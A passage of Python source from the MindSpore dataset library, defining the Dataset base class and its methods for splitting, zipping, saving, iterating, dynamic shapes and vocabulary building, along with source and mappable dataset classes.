>>> # TextFileDataset is not a mappable dataset, so this non-optimized split will be called.
>>> # Since many datasets have shuffle on by default, set shuffle to False if split will be called!
>>> dataset = ds.TextFileDataset(text_file_dataset_dir, shuffle=False)
>>> train_dataset, test_dataset = dataset.split([0.9, 0.1])
"""
if self.is_shuffled():
logger.warning("Dataset is shuffled before split.")
if self.is_sharded():
raise RuntimeError("Dataset should not be sharded before split.")
absolute_sizes = self._get_absolute_split_sizes(sizes)
splits = []
rows_to_skip = 0
for size in absolute_sizes:
ds = copy.deepcopy(self)
if randomize:
# want to shuffle the same way every epoch before split
# in alter_tree, shuffle buffer is minimum 10000, so use 10000 here
ds = ds.shuffle(10000)
ds.reshuffle_each_epoch = False
if rows_to_skip > 0:
ds = ds.skip(rows_to_skip)
ds = ds.take(size)
splits.append(ds)
rows_to_skip += size
return tuple(splits)
@check_zip_dataset
def zip(self, datasets):
"""
Zip this dataset with the datasets given in the input tuple. Columns in the input datasets must have
different names.
Args:
datasets (Union[tuple, class Dataset]): A tuple of datasets or a single class Dataset
to be zipped together with this dataset.
Returns:
Dataset, dataset zipped.
Examples:
>>> # Create a dataset which is the combination of dataset and dataset_1
>>> dataset = dataset.zip(dataset_1)
"""
if isinstance(datasets, tuple):
datasets = (self, *datasets)
elif isinstance(datasets, Dataset):
datasets = (self, datasets)
else:
raise TypeError("Invalid datasets, expected Dataset object or tuple of Dataset, but got %s!" % datasets)
return ZipDataset(datasets)
@check_concat
def concat(self, datasets):
"""
Concatenate the dataset objects in the input list.
Performing "+" operation on dataset objects can achieve the same effect.
Note:
The column names, and the rank and type of the column data, must be the same in the input datasets.
Args:
datasets (Union[list, class Dataset]): A list of datasets or a single class Dataset
to be concatenated together with this dataset.
Returns:
Dataset, dataset concatenated.
Examples:
>>> # Create a dataset by concatenating dataset_1 and dataset_2 with "+" operator
>>> dataset = dataset_1 + dataset_2
>>> # Create a dataset by concatenating dataset_1 and dataset_2 with concat operation
>>> dataset = dataset_1.concat(dataset_2)
"""
if isinstance(datasets, Dataset):
datasets = [self] + [datasets]
elif isinstance(datasets, list):
datasets = [self] + datasets
else:
raise TypeError("Invalid datasets, expected Dataset object or list of Dataset, but got %s!" % datasets)
return ConcatDataset(datasets)
@check_rename
def rename(self, input_columns, output_columns):
"""
Rename the columns in input datasets.
Args:
input_columns (Union[str, list[str]]): List of names of the input columns.
output_columns (Union[str, list[str]]): List of names of the output columns.
Returns:
Dataset, dataset renamed.
Examples:
>>> # dataset is an instance object of Dataset
>>> input_columns = ["input_col1", "input_col2", "input_col3"]
>>> output_columns = ["output_col1", "output_col2", "output_col3"]
>>>
>>> # Create a dataset where input_col1 is renamed to output_col1, and
>>> # input_col2 is renamed to output_col2, and input_col3 is renamed
>>> # to output_col3.
>>> dataset = dataset.rename(input_columns=input_columns, output_columns=output_columns)
"""
return RenameDataset(self, input_columns, output_columns)
@check_project
def project(self, columns):
"""
Project certain columns in input dataset.
The specified columns will be selected from the dataset and passed into
the pipeline in the order specified. The other columns are discarded.
Args:
columns(Union[str, list[str]]): List of names of the columns to project.
Returns:
Dataset, dataset projected.
Examples:
>>> # dataset is an instance object of Dataset
>>> columns_to_project = ["column3", "column1", "column2"]
>>>
>>> # Create a dataset that consists of column3, column1, column2
>>> # in that order, regardless of the original order of columns.
>>> dataset = dataset.project(columns=columns_to_project)
"""
return ProjectDataset(self, columns)
def apply(self, apply_func):
"""
Apply a function in this dataset.
Args:
apply_func (function): A function that must take one 'Dataset' as an argument and
return a preprocessed 'Dataset'.
Returns:
Dataset, dataset applied by the function.
Examples:
>>> # dataset is an instance object of Dataset
>>>
>>> # Declare an apply_func function which returns a Dataset object
>>> def apply_func(data):
... data = data.batch(2)
... return data
>>>
>>> # Use apply to call apply_func
>>> dataset = dataset.apply(apply_func)
Raises:
TypeError: If apply_func is not a function.
TypeError: If apply_func doesn't return a Dataset.
"""
if not hasattr(apply_func, '__call__'):
raise TypeError("apply_func must be a function.")
dataset = apply_func(self)
if not isinstance(dataset, Dataset):
raise TypeError("apply_func must return a dataset.")
return dataset
@check_device_send
def device_que(self, send_epoch_end=True, create_data_info_queue=False):
"""
Return a transferred Dataset that transfers data through a device.
Args:
send_epoch_end (bool, optional): Whether to send the end of sequence to the device or not (default=True).
create_data_info_queue (bool, optional): Whether to create a queue that stores the
types and shapes of the data or not (default=False).
Note:
If the device is Ascend, features of the data will be transferred one by one. The limit for
a single data transfer is 256M.
Returns:
Dataset, dataset for transferring.
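Examples:
>>> # Usage sketch only (assumes `dataset` is an existing Dataset instance and that a device
>>> # context has already been configured); send() starts pushing data to the device queue.
>>> transfer_dataset = dataset.device_que()
>>> transfer_dataset.send()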
"""
return self.to_device(send_epoch_end=send_epoch_end, create_data_info_queue=create_data_info_queue)
@check_device_send
def to_device(self, send_epoch_end=True, create_data_info_queue=False):
"""
Transfer data from CPU to GPU or Ascend or other devices.
Args:
send_epoch_end (bool, optional): Whether to send the end of sequence to device or not (default=True).
create_data_info_queue (bool, optional): Whether to create a queue that stores the
types and shapes of the data or not (default=False).
Note:
If the device is Ascend, features of the data will be transferred one by one. The limit for
data transmission per second is 256M.
Returns:
TransferDataset, dataset for transferring.
Raises:
RuntimeError: If distribution file path is given but failed to read.
"""
return TransferDataset(self, send_epoch_end, create_data_info_queue)
@check_save
def save(self, file_name, num_files=1, file_type='mindrecord'):
"""
Save the dynamic data processed by the dataset pipeline in common dataset format.
Supported dataset formats: 'mindrecord' only
Implicit type casting exists when saving data as 'mindrecord'. The table below shows how type casting is performed.
.. list-table:: Implicit Type Casting when Saving as 'mindrecord'
:widths: 25 25 50
:header-rows: 1
* - Type in 'dataset'
- Type in 'mindrecord'
- Details
* - bool
- None
- Not supported
* - int8
- int32
-
* - uint8
- bytes(1D uint8)
- Drop dimension
* - int16
- int32
-
* - uint16
- int32
-
* - int32
- int32
-
* - uint32
- int64
-
* - int64
- int64
-
* - uint64
- None
- Not supported
* - float16
- float32
-
* - float32
- float32
-
* - float64
- float64
-
* - string
- string
- Multi-dimensional string not supported
Note:
1. To save the samples in order, set dataset's shuffle to False and num_files to 1.
2. Before calling this function, do not use the batch operator, the repeat operator or data augmentation
operators with a random attribute in the map operator.
3. When array dimension is variable, one-dimensional arrays or
multi-dimensional arrays with variable dimension 0 are supported.
4. MindRecord does not support uint64, multi-dimensional uint8 (the dimension is dropped) or
multi-dimensional strings.
Args:
file_name (str): Path to dataset file.
num_files (int, optional): Number of dataset files (default=1).
file_type (str, optional): Dataset format (default='mindrecord').
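Examples:
>>> # Minimal sketch only; the output path below is hypothetical, and the dataset should not be
>>> # batched, repeated or randomly augmented before calling save (see the Note above).
>>> dataset.save("/path/to/processed_data.mindrecord", num_files=1)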
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
consumer = cde.PythonSaveToDisk(file_name, num_files, file_type)
consumer.Init(ir_tree)
runtime_context.AssignConsumer(consumer)
consumer.Save()
_set_dataset_permissions(file_name, num_files)
del api_tree
@check_tuple_iterator
def create_tuple_iterator(self, columns=None, num_epochs=-1, output_numpy=False, do_copy=True):
"""
Create an iterator over the dataset. The datatype retrieved back will be a list of ndarrays.
To specify which columns to list and their order, use the `columns` parameter. If `columns`
is not provided, the order of the columns will remain unchanged.
Args:
columns (list[str], optional): List of columns to be used to specify the order of columns
(default=None, means all columns).
num_epochs (int, optional): Maximum number of epochs that iterator can be iterated.
(default=-1, iterator can be iterated infinite number of epochs)
output_numpy (bool, optional): Whether or not to output NumPy datatype.
If output_numpy=False, iterator will output MSTensor (default=False).
do_copy (bool, optional): When the output data type is mindspore.Tensor, use this parameter to select the
conversion method. Setting it to False gives better performance (default=True).
Returns:
Iterator, tuple iterator over the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> iterator = dataset.create_tuple_iterator()
>>> for item in iterator:
... # item is a list
... print(type(item))
... break
<class 'list'>
"""
if output_numpy is None:
output_numpy = False
if Dataset._noop_mode():
return DummyIterator(self, 'tuple')
return TupleIterator(self, columns, num_epochs, output_numpy, do_copy)
@check_dict_iterator
def create_dict_iterator(self, num_epochs=-1, output_numpy=False):
"""
Create an iterator over the dataset. The data retrieved will be a dictionary datatype.
The order of the columns in the dictionary may not be the same as the original order.
Args:
num_epochs (int, optional): Maximum number of epochs that iterator can be iterated
(default=-1, iterator can be iterated infinite number of epochs).
output_numpy (bool, optional): Whether or not to output NumPy datatype,
if output_numpy=False, iterator will output MSTensor (default=False).
Returns:
Iterator, dictionary iterator over the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> iterator = dataset.create_dict_iterator()
>>> for item in iterator:
... # item is a dict
... print(type(item))
... break
<class 'dict'>
"""
if output_numpy is None:
output_numpy = False
if Dataset._noop_mode():
return DummyIterator(self, 'dict')
return DictIterator(self, num_epochs, output_numpy)
def __iter__(self):
"""Create an iterator over the dataset."""
return self.create_tuple_iterator(num_epochs=1)
@property
def input_indexs(self):
"""
Get the input index information.
Returns:
tuple, tuple of the input index information.
Examples:
>>> # dataset is an instance object of Dataset
>>> # set input_indexs
>>> dataset.input_indexs = 10
>>> print(dataset.input_indexs)
10
"""
if self._input_indexs != ():
return self._input_indexs
# find input_indexes of children
children_input_index = [child.input_indexs for child in self.children]
# in case of more than one child, return the first input_indexes
for cix in children_input_index:
if cix != ():
return cix
# if all children's input_indexes are () or the node is a leaf
return self._input_indexs
@input_indexs.setter
def input_indexs(self, value):
self._input_indexs = value
def copy_batch_size(self, value):
self._batch_size = value
def _init_tree_getters(self):
"""
Get pipeline information.
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
getter = cde.TreeGetters()
getter.Init(ir_tree)
runtime_context.AssignConsumer(getter)
return getter, runtime_context, api_tree
def __init_size_getter(self):
"""
Get pipeline information.
"""
ir_tree, api_tree = self.create_ir_tree()
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
getter = cde.DatasetSizeGetters()
getter.Init(ir_tree)
runtime_context.AssignConsumer(getter)
return getter, runtime_context, api_tree
def get_col_names(self):
"""
Return the names of the columns in dataset.
Returns:
list, list of column names in the dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> col_names = dataset.get_col_names()
"""
if self._col_names is None:
runtime_getter = self._init_tree_getters()
self._col_names = runtime_getter[0].GetColumnNames()
self.close_pool()
runtime_getter[2].notify_watchdog()
return self._col_names
def output_shapes(self):
"""
Get the shapes of output data.
Returns:
list, list of shapes of each column.
Examples:
>>> # dataset is an instance object of Dataset
>>> output_shapes = dataset.output_shapes()
"""
if self.saved_output_shapes is None:
runtime_getter = self._init_tree_getters()
self.saved_output_shapes = runtime_getter[0].GetOutputShapes()
self.saved_output_types = runtime_getter[0].GetOutputTypes()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self.dynamic_setting[0]:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_output_shapes
def output_types(self):
"""
Get the types of output data.
Returns:
list, list of data types.
Examples:
>>> # dataset is an instance object of Dataset
>>> output_types = dataset.output_types()
"""
if self.saved_output_types is None:
runtime_getter = self._init_tree_getters()
self.saved_output_shapes = runtime_getter[0].GetOutputShapes()
self.saved_output_types = runtime_getter[0].GetOutputTypes()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self.dynamic_setting[0]:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_output_types
def get_dataset_size(self):
"""
Return the number of batches in an epoch.
Returns:
int, number of batches.
Examples:
>>> # dataset is an instance object of Dataset
>>> dataset_size = dataset.get_dataset_size()
"""
if self.dataset_size is None:
runtime_getter = self.__init_size_getter()
self.dataset_size = runtime_getter[0].GetDatasetSize(False)
self.close_pool()
runtime_getter[2].notify_watchdog()
return self.dataset_size
def set_dynamic_columns(self, columns=None):
"""
Set dynamic shape information of the source data. It should be set after the pipeline is defined.
Args:
columns (dict): A dict containing the shape information of each column in the dataset.
A value of :py:obj:`None` at shape[i] indicates that the length of dimension i is dynamic.
Examples:
>>> import numpy as np
>>>
>>> def generator1():
... for i in range(1, 100):
... yield np.ones((16, i, 83)), np.array(i)
>>>
>>> dataset = ds.GeneratorDataset(generator1, ["data1", "data2"])
>>> dataset.set_dynamic_columns(columns={"data1": [16, None, 83], "data2": []})
"""
if not isinstance(columns, dict):
raise TypeError("Pass a dict to set dynamic shape, example: {\"data1\": [16, None, 256]}")
self.dynamic_setting[0] = True
self.dynamic_setting[1] = columns
def dynamic_min_max_shapes(self):
"""
Get minimum and maximum data length of dynamic source data, for dynamic graph compilation.
Returns:
lists, min_shapes, max_shapes of source data.
Examples:
>>> import numpy as np
>>>
>>> def generator1():
... for i in range(1, 100):
... yield np.ones((16, i, 83)), np.array(i)
>>>
>>> dataset = ds.GeneratorDataset(generator1, ["data1", "data2"])
>>> dataset.set_dynamic_columns(columns={"data1": [16, None, 83], "data2": []})
>>> min_shapes, max_shapes = dataset.dynamic_min_max_shapes()
"""
if self.saved_min_shapes is None or self.saved_max_shapes is None:
self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes = self._dynamic_output_shapes()
return self.saved_min_shapes, self.saved_max_shapes
@staticmethod
def __check_dynamic_column_name(dynamic_columns, dataset_columns):
for column in dynamic_columns:
if column not in dataset_columns:
raise RuntimeError("dynamic column [" + column + "] does not match any column in dataset: " +
str(dataset_columns))
@staticmethod
def __check_dynamic_column_shape(data, col, dynamic_columns):
shape_mismatch = "dynamic column [" + col + "] with shape " + str(dynamic_columns[col]) + \
" does not match dataset column [" + col + "] with shape " + str(list(data[col].shape))
if data[col].ndim != len(dynamic_columns[col]):
raise RuntimeError(shape_mismatch)
for dim in range(len(dynamic_columns[col])):
if dynamic_columns[col][dim] is not None and dynamic_columns[col][dim] != data[col].shape[dim]:
raise RuntimeError(shape_mismatch)
def _dynamic_output_shapes(self):
"""
Get dynamic information of source data.
Returns:
lists, dynamic_shapes, min_shapes, max_shapes of source data.
"""
if not self.dynamic_setting[1]:
raise RuntimeError("dynamic_columns is not set, call set_dynamic_columns() by final Dataset Op.")
if self.saved_output_shapes is not None and self.saved_min_shapes is not None and \
self.saved_max_shapes is not None:
return self.saved_output_shapes, self.saved_min_shapes, self.saved_max_shapes
logger.warning("Calculating dynamic shape of input data, this will take a few minutes...")
# Assume data1 shape is dynamic, data2 shape is fix
# {"data1": [batch_size, None, feat_len], "data2": [batch_size, feat_len]}
dynamic_columns = self.dynamic_setting[1]
# ["data1", "data2"]
dataset_columns = self.get_col_names()
Dataset.__check_dynamic_column_name(dynamic_columns, dataset_columns)
# Shape[1] of data1 is variable
# {"data1": {(batch_size, 100, feat_len), (16, 200, 83)}, "data2": {(batch_size, feat_len)}}
column_shape_set = {col: set() for col in dataset_columns}
dataset_size_counter = 0
for data in self.create_dict_iterator(num_epochs=1, output_numpy=True):
dataset_size_counter += 1
for col in data.keys():
if col in dynamic_columns:
Dataset.__check_dynamic_column_shape(data, col, dynamic_columns)
column_shape_set[col].add(tuple(data[col].shape))
# we get dataset_size after dryrun
self.dataset_size = dataset_size_counter
min_shapes, max_shapes, dynamic_shapes = list(), list(), list()
for col, shape_set in column_shape_set.items():
if len(shape_set) > 1:
if col not in dynamic_columns:
raise RuntimeError("column [" + col + "] has dynamic shape but not set by set_dynamic_columns()" +
", shapes of [" + col + "]: " + str(list(shape_set)))
shape_npy = np.array(list(shape_set))
max_shape = shape_npy.max(axis=0)
min_shape = shape_npy.min(axis=0)
# Set min shape to 1 due to unknown shuffle
min_shape = np.where(np.equal(dynamic_columns[col], None), 1, min_shape)
# Set dynamic dim to -1 for ME
dynamic_shape = np.where(np.equal(dynamic_columns[col], None), -1, dynamic_columns[col])
max_shapes.append(max_shape.tolist())
min_shapes.append(min_shape.tolist())
dynamic_shapes.append(dynamic_shape.tolist())
else:
# Also append fix shape to keep order of column shape
fix_shape = list(list(shape_set)[0])
max_shapes.append(fix_shape)
min_shapes.append(fix_shape)
dynamic_shapes.append(fix_shape)
if col in dynamic_columns:
logger.warning("column [" + col + "] has no dynamic shape but set by set_dynamic_columns()")
# Set min shape to 1 due to unknown shuffle
min_shapes[-1] = np.where(np.equal(dynamic_columns[col], None), 1, fix_shape).tolist()
# Set dynamic dim to -1 for ME
dynamic_shapes[-1] = np.where(np.equal(dynamic_columns[col], None), -1, fix_shape).tolist()
return dynamic_shapes, min_shapes, max_shapes
def num_classes(self):
"""
Get the number of classes in a dataset.
Returns:
int, number of classes.
Examples:
>>> # dataset is an instance object of Dataset
>>> num_classes = dataset.num_classes()
"""
if self._num_classes is None:
runtime_getter = self._init_tree_getters()
self._num_classes = runtime_getter[0].GetNumClasses()
self.close_pool()
runtime_getter[2].notify_watchdog()
if self._num_classes == -1:
return None
return self._num_classes
def get_sync_notifiers(self):
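"""Collect the sync_wait notifier callables from the child pipeline (empty dict for leaf nodes)."""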
if self.children:
return self.children[0].get_sync_notifiers()
return {}
def disable_sync(self):
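"""Disable any sync_wait condition found in the child pipeline (no-op for leaf nodes)."""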
if self.children:
return self.children[0].disable_sync()
return {}
def is_sync(self):
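"""Return True if a sync_wait operation exists in the child pipeline."""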
if self.children:
return self.children[0].is_sync()
return False
def sync_update(self, condition_name, num_batch=None, data=None):
"""
Release a blocking condition and trigger callback with given data.
Args:
condition_name (str): The condition name that is used to toggle sending next row.
num_batch (Union[int, None]): The number of batches (rows) that are released.
When num_batch is None, it will default to the number specified by the
sync_wait operator (default=None).
data (Any): The data passed to the callback, user defined (default=None).
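Examples:
>>> # Sketch only: assumes the pipeline was built with
>>> # dataset.sync_wait(condition_name="policy", callback=some_callback) beforehand.
>>> dataset.sync_update(condition_name="policy", data={"loss": 0.1})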
"""
if (not isinstance(num_batch, int) and num_batch is not None) or \
(isinstance(num_batch, int) and num_batch <= 0):
# throwing exception, disable all sync_wait in pipeline
self.disable_sync()
raise RuntimeError("Sync_update batch size can only be positive integer, got : {}.".format(num_batch))
notifiers_dict = self.get_sync_notifiers()
if not isinstance(condition_name, str):
raise TypeError("Argument condition_name with value {} is not of type str, but got {}."
.format(condition_name, type(condition_name)))
if condition_name not in notifiers_dict:
# throwing exception, disable all sync_wait in pipeline
self.disable_sync()
raise RuntimeError("Condition name not found.")
if num_batch is not None:
num_batch *= self.get_batch_size()
notifiers_dict[condition_name](num_batch, data)
def get_batch_size(self):
"""
Return the batch size.
Returns:
int, the number of rows in a batch.
Examples:
>>> # dataset is an instance object of Dataset
>>> batch_size = dataset.get_batch_size()
"""
if self._batch_size is None:
runtime_getter = self._init_tree_getters()
self._batch_size = runtime_getter[0].GetBatchSize()
if self._batch_size is None:
self._batch_size = 1
return self._batch_size
def get_repeat_count(self):
"""
Get the repeat count of the RepeatDataset (default is 1).
Returns:
int, the count of repeat.
Examples:
>>> # dataset is an instance object of Dataset
>>> repeat_count = dataset.get_repeat_count()
"""
if self._repeat_count is None:
runtime_getter = self._init_tree_getters()
self._repeat_count = runtime_getter[0].GetRepeatCount()
if self._repeat_count is None:
self._repeat_count = 1
return self._repeat_count
def get_class_indexing(self):
"""
Return the class index.
Returns:
dict, a str-to-int mapping from label name to index.
dict, a str-to-list<int> mapping from label name to index for Coco ONLY. The second number
in the list is used to indicate the super category.
Examples:
>>> # dataset is an instance object of Dataset
>>> class_indexing = dataset.get_class_indexing()
"""
if self.children:
return self.children[0].get_class_indexing()
return {}
def reset(self):
"""Reset the dataset for next epoch."""
def is_shuffled(self):
"""Returns True if the dataset or its children is shuffled."""
for input_dataset in self.children:
if input_dataset.is_shuffled():
return True
return False
def is_sharded(self):
"""Returns True if the dataset or its children is sharded."""
for input_dataset in self.children:
if input_dataset.is_sharded():
return True
return False
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def post_parse(self, ir_node):
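"""Attach common IR settings (cache client and number of parallel workers) to the parsed IR node."""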
if self.cache:
ir_node = ir_node.set_cache_client(self.cache.cache_client)
if self.num_parallel_workers:
ir_node = ir_node.set_num_workers(self.num_parallel_workers)
return ir_node
class VisionBaseDataset(Dataset):
"""
Abstract class to represent a vision source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class TextBaseDataset(Dataset):
"""
Abstract class to represent a text source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def build_vocab(self, columns, freq_range, top_k, special_tokens, special_first):
"""
Function to create a Vocab from source dataset.
The source dataset is expected to be a text dataset.
Build a vocab from a dataset. This collects all the unique words in the dataset and returns a vocab
that contains the top_k most frequent words (if top_k is specified).
Args:
columns(Union[str, list[str]]): Column names to get words from.
freq_range(tuple[int]): A tuple of integers (min_frequency, max_frequency). Words within the frequency
range will be stored.
Naturally 0 <= min_frequency <= max_frequency <= total_words. min_frequency/max_frequency
can be set to default, which corresponds to 0/total_words respectively.
top_k(int): Number of words to be built into the vocab. The top_k most frequent words are
taken. top_k is applied after freq_range. If there are fewer than top_k words, all words will be taken.
special_tokens(list[str]): A list of strings, each one is a special token.
special_first(bool): Whether special_tokens will be prepended/appended to the vocab. If special_tokens
is specified and special_first is set to default, special_tokens will be prepended.
Returns:
Vocab, vocab built from the dataset.
Examples:
>>> import numpy as np
>>>
>>> def gen_corpus():
... # key: word, value: number of occurrences, reason for using letters is so their order is apparent
... corpus = {"Z": 4, "Y": 4, "X": 4, "W": 3, "U": 3, "V": 2, "T": 1}
... for k, v in corpus.items():
... yield (np.array([k] * v, dtype='S'),)
>>> column_names = ["column1"]
>>> dataset = ds.GeneratorDataset(gen_corpus, column_names)
>>> dataset = dataset.build_vocab(columns=["column1"],
... freq_range=(1, 10), top_k=5,
... special_tokens=["<pad>", "<unk>"],
... special_first=True)
"""
vocab = cde.Vocab()
columns = replace_none(columns, [])
if not isinstance(columns, list):
columns = [columns]
freq_range = replace_none(freq_range, (0, 9223372036854775807))
if freq_range[0] is None:
freq_range = (0, freq_range[1])
if freq_range[1] is None:
freq_range = (freq_range[0], 9223372036854775807)
special_tokens = replace_none(special_tokens, [])
top_k = replace_none(top_k, 9223372036854775807)
ir_tree, api_tree = self.create_ir_tree()
# vocab node
vocab_node = cde.BuildVocabNode(ir_tree, vocab, columns, freq_range, top_k, special_tokens, special_first)
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
# build vocab
consumer = cde.PythonBuildVocabConsumer()
consumer.Init(vocab_node)
runtime_context.AssignConsumer(consumer)
consumer.Start()
del api_tree
return vocab
def build_sentencepiece_vocab(self, columns, vocab_size, character_coverage, model_type, params):
"""
Function to create a SentencePieceVocab from source dataset.
The source dataset is expected to be a text dataset.
Args:
columns(list[str]): Column names to get words from.
vocab_size(int): Vocabulary size.
character_coverage(float): Percentage of characters covered by the model, must be between
0.98 and 1.0. Good defaults are 0.9995 for languages with rich character sets like
Japanese or Chinese, and 1.0 for other languages with small character sets
like English or Latin.
model_type(SentencePieceModel): Model type. Choose from unigram (default), bpe, char, or word.
The input sentence must be pretokenized when using word type.
params(dict): Any extra optional parameters for the sentencepiece library, according to your raw data.
Returns:
SentencePieceVocab, vocab built from the dataset.
Examples:
>>> from mindspore.dataset.text import SentencePieceModel
>>>
>>> # You can construct any text dataset as source, take TextFileDataset as example.
>>> dataset = ds.TextFileDataset("/path/to/sentence/piece/vocab/file", shuffle=False)
>>> dataset = dataset.build_sentencepiece_vocab(["text"], 5000, 0.9995, SentencePieceModel.UNIGRAM, {})
"""
if not isinstance(model_type, SentencePieceModel):
raise TypeError("Argument model_type with value {0} is not of type SentencePieceModel, but got {1}."\
.format(model_type, type(model_type)))
model_type = DE_C_INTER_SENTENCEPIECE_MODE[model_type]
vocab = cde.SentencePieceVocab()
ir_tree, api_tree = self.create_ir_tree()
# vocab node
vocab_node = cde.BuildSentenceVocabNode(ir_tree, vocab, columns, vocab_size, character_coverage, model_type,
params)
runtime_context = cde.PythonRuntimeContext()
runtime_context.Init()
# build vocab
consumer = cde.PythonBuildVocabConsumer()
consumer.Init(vocab_node)
runtime_context.AssignConsumer(consumer)
consumer.Start()
del api_tree
return vocab
class AudioBaseDataset(Dataset):
"""
Abstract class to represent an audio source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class UnionBaseDataset(VisionBaseDataset, TextBaseDataset, AudioBaseDataset):
"""
Abstract class to represent a union source dataset which produces content to the data pipeline.
"""
def __init__(self, children=None, num_parallel_workers=None, cache=None):
super().__init__(children=children, num_parallel_workers=num_parallel_workers, cache=cache)
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
class SourceDataset(Dataset):
"""
Abstract class to represent a source dataset which produces content to the data pipeline.
"""
def __init__(self, num_parallel_workers=None, num_samples=None, shuffle=True, num_shards=None, shard_id=None,
cache=None):
super().__init__(num_parallel_workers=num_parallel_workers, cache=cache)
self.num_samples = replace_none(num_samples, 0)
self.num_shards = replace_none(num_shards, 1)
self.shard_id = replace_none(shard_id, 0)
if shuffle is not None and not isinstance(shuffle, (bool, Shuffle)):
raise TypeError("shuffle must be of boolean or enum of 'Shuffle' values like 'Shuffle.GLOBAL' or "
"'Shuffle.FILES' or 'Shuffle.INFILE'.")
self.shuffle_flag = 2 # Global shuffle
if not isinstance(shuffle, Shuffle):
if shuffle is None or shuffle:
self.shuffle_flag = 2 # Global shuffle
else:
self.shuffle_flag = 0 # No shuffle
else:
if shuffle == Shuffle.GLOBAL:
self.shuffle_flag = 2 # Global shuffle
elif shuffle == Shuffle.FILES:
self.shuffle_flag = 1 # Files shuffle
elif shuffle == Shuffle.INFILE:
self.shuffle_flag = 3 # Infile shuffle
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
@staticmethod
def _find_files(patterns):
"""
Utility function to search for files with the given glob patterns.
Args:
patterns (Union[str, list[str]]): String or list of patterns to be searched.
Returns:
list, list of files.
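Examples:
>>> # Illustrative only; the glob pattern below is hypothetical.
>>> file_list = SourceDataset._find_files(["/path/to/text_files/*.txt"])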
"""
if not isinstance(patterns, list):
patterns = [patterns]
file_list = []
unmatched_patterns = []
for pattern in patterns:
matches = [match for match in glob.glob(pattern, recursive=True) if os.path.isfile(match)]
if matches:
file_list.extend(matches)
else:
unmatched_patterns.append(pattern)
if unmatched_patterns:
raise ValueError("The following patterns did not match any files: {}.".format(unmatched_patterns))
if file_list: # not empty
return file_list
raise ValueError("The list of path names matching the patterns is empty.")
def is_shuffled(self):
return self.shuffle_flag > 0
def is_sharded(self):
if self.num_shards is not None:
return self.num_shards > 1
return False
class MappableDataset(SourceDataset):
"""
Abstract class to represent a source dataset which supports use of samplers.
"""
def parse(self, children=None):
raise NotImplementedError("Dataset has to implement parse method.")
def __init__(self, num_parallel_workers=None, sampler=None, num_samples=None, shuffle=None, num_shards=None,
shard_id=None, cache=None):
super().__init__(num_parallel_workers=num_parallel_workers, num_samples=num_samples, shuffle=shuffle,
num_shards=num_shards, shard_id=shard_id, cache=cache)
self.shuffle_flag = replace_none(shuffle, True)
self.sampler = samplers.select_sampler(num_samples, sampler, shuffle, num_shards, shard_id)
def add_sampler(self, new_sampler):
"""
Add a sampler for current dataset.
Args:
new_sampler (Sampler): The sampler to be added as the parent sampler for current dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> # use a DistributedSampler instead
>>> new_sampler = ds.DistributedSampler(10, 2)
>>> dataset.add_sampler(new_sampler)
"""
# note: By adding a sampler, the sampled IDs will flow to new_sampler
# after first passing through the current samplers attached to this dataset.
self.dataset_size = None
new_sampler.add_child(self.sampler)
self.sampler = new_sampler
def use_sampler(self, new_sampler):
"""
Make the current dataset use the new_sampler provided by another API.
Args:
new_sampler (Sampler): The sampler to use for the current dataset.
Examples:
>>> # dataset is an instance object of Dataset
>>> # use a DistributedSampler instead
>>> new_sampler = ds.DistributedSampler(10, 2)
>>> dataset.use_sampler(new_sampler)
"""
if new_sampler is None:
raise TypeError("Input sampler can not be None.")
if not isinstance(new_sampler, (samplers.BuiltinSampler, samplers.Sampler)):
raise TypeError("Input sampler is not an instance of a sampler.")
self.dataset_size = None
self.sampler = self.sampler.child_sampler
self.add_sampler(new_sampler)
def is_shuffled(self):
return self.sampler.is_shuffled()
def is_sharded(self):
return self.sampler.is_sharded()
@check_split
def split(self, sizes, randomize=True):
"""
Split the dataset into smaller, non-overlapping datasets.
Args:
sizes (Union[list[int], list[float]]): If a list of integers [s1, s2, …, sn] is
provided, the dataset will be split into n datasets of size s1, size s2, …, size sn
respectively. If the sum of all sizes does not equal the original dataset size, an
error will occur.
If a list of floats [f1, f2, …, fn] is provided, all floats must be between 0 and 1
and must sum to 1, otherwise an error will occur. The dataset will be split into n
Datasets of size round(f1*K), round(f2*K), …, round(fn*K) where K is the size of the
original dataset.
If after rounding:
- Any size equals 0, an error will occur.
- The sum of split sizes < K, the difference will be added to the first split.
- The sum of split sizes > K, the difference will be removed from the first large
enough split such that it will have at least 1 row after removing the difference.
randomize (bool, optional): Determines whether or not to split the data randomly (default=True).
If True, the data will be randomly split. Otherwise, each split will be created with
consecutive rows from the dataset.
Note:
1. There is an optimized split function, which will be called automatically when the dataset
that calls this function is a MappableDataset.
2. Dataset should not be sharded if split is going to be called. Instead, create a
DistributedSampler and specify a split to shard after splitting. If the dataset is
sharded after a split, it is strongly recommended to set the same seed in each instance
